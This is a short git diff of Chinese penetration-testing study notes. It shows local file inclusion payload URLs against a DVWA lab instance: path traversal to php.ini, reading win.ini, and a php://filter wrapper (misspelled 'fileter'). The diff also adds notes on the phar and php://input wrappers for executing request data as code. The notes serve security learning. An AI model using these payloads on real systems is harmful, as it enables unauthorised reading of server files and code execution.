--- a/安全/渗透.md
+++ b/安全/渗透.md
@@ -282,11 +282,13 @@ fping -ag 192.169.99.0/24
 
 ```
 http://192.168.99.181/DVWA-master/vulnerabilities/fi/?page=../../php.ini
-
-
 http://192.168.99.181/DVWA-master/vulnerabilities/fi/?page=file:///C:/windows/win.ini
-
 http://192.168.99.181/DVWA-master/vulnerabilities/fi/?page=php://fileter/converter.base64-encode/resource=include.php
+
+pha:协议
+
+php://input 协议 将请求中的数据作为php 代码执行
+
 ```
 
 
